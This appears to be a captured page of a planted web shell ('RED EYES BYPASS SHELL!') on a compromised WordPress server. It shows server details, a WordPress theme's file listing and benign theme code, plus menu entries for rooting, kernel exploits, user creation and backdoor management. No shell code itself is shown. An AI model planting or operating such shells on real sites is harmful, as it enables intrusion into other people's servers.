Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
themes /
greengrass /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
parts
[ DIR ]
drwxr-xr-x
patterns
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
block-patterns.php
1.16
KB
-rwxr-xr-x
change_log.txt
83
B
-rwxr-xr-x
functions.php
2.87
KB
-rwxr-xr-x
license.txt
35.01
KB
-rwxr-xr-x
readme.txt
3.04
KB
-rwxr-xr-x
screenshot.png
165.84
KB
-rwxr-xr-x
style.css
12.9
KB
-rwxr-xr-x
theme.json
11.56
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : block-patterns.php
<?php /** * Greengrass: Block Patterns * * @since Greengrass 1.0 */ /** * Registers block patterns and categories. * * @since Greengrass 1.0 * * @return void */ function greengrass_register_block_patterns() { $block_pattern_categories = array( 'greengrass' => array( 'label' => __( 'Greengrass', 'greengrass' ) ), ); /** * Filters the theme block pattern categories. * * @since Greengrass 1.0 * * @param array[] $block_pattern_categories { * An associative array of block pattern categories, keyed by category name. * * @type array[] $properties { * An array of block category properties. * * @type string $label A human-readable label for the pattern category. * } * } */ $block_pattern_categories = apply_filters( 'greengrass_block_pattern_categories', $block_pattern_categories ); foreach ( $block_pattern_categories as $name => $properties ) { if ( ! WP_Block_Pattern_Categories_Registry::get_instance()->is_registered( $name ) ) { register_block_pattern_category( $name, $properties ); } } } add_action( 'init', 'greengrass_register_block_patterns', 9 );
Close